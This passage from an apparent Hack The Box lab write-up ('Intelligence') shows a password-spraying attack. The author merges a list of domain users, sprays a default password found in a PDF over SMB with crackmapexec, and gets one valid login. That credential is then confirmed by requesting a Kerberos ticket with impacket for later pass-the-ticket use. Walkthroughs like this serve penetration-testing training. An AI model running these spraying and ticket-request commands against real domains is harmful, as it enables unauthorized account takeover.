Password Spraying


Using the custom Python script, I pinpointed a PDF file that holds a CLEARTEXT password: NewIntelligenceCorpUser9876. It is believed to be a default password for a new user in the target domain. Although the owner of this CLEARTEXT password is yet to be determined, I could carry out a password spraying attack to identify the new user associated with the default password.

Up until now, I have gathered a number of valid domain users from two different sources:

┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ cat users_from_naming_convention.txt creator_users.txt | sort -u | tr -d '[:blank:]' > merged.txt 

I first sort and merge those two files of valid domain users.

┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ wc -l merged.txt                                                                     
32 merged.txt

The result is a total of 32 valid domain users.

Fail with Kerberos


Unfortunately, it doesn't seem to work with Kerberos. I will fall back to NTLM authentication.

NTLM


┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ crackmapexec smb $IP -u merged.txt -p 'NewIntelligenceCorpUser9876' --continue-on-success                 
smb         10.10.10.248    445    dc               [*] windows 10.0 build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
smb         10.10.10.248    445    dc               [-] intelligence.htb\anita.roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\brian.baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\brian.morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\daniel.shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\danny.matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\darryl.harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\david.mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\david.reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\david.wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\ian.duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\jason.patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\jason.wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\jennifer.thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\jessica.moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\joel.crawford:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\john.coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\jose.williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\kaitlyn.zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\kelly.long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\laura.lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\nicole.brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\richard.williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\samuel.richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\scott.scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\stephanie.young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\teresa.williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\thomas.hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\thomas.valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [+] intelligence.htb\tiffany.molina:NewIntelligenceCorpUser9876 
smb         10.10.10.248    445    dc               [-] intelligence.htb\travis.evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\veronica.patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
smb         10.10.10.248    445    dc               [-] intelligence.htb\william.lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 

Performing a password spraying attack with crackmapexec over NTLM authentication, the result shows a single new user (owner): the default password, NewIntelligenceCorpUser9876, belongs to the tiffany.molina user.

I will attempt to re-validate the credential against the target KDC.

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ impacket-getTGT intelligence.htb/tiffany.molina@dc.intelligence.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: NewIntelligenceCorpUser9876
[*] Saving ticket in tiffany.molina@dc.intelligence.htb.ccache

VALIDATED. The TGT for the tiffany.molina user is saved for the pass_the_ticket OPSEC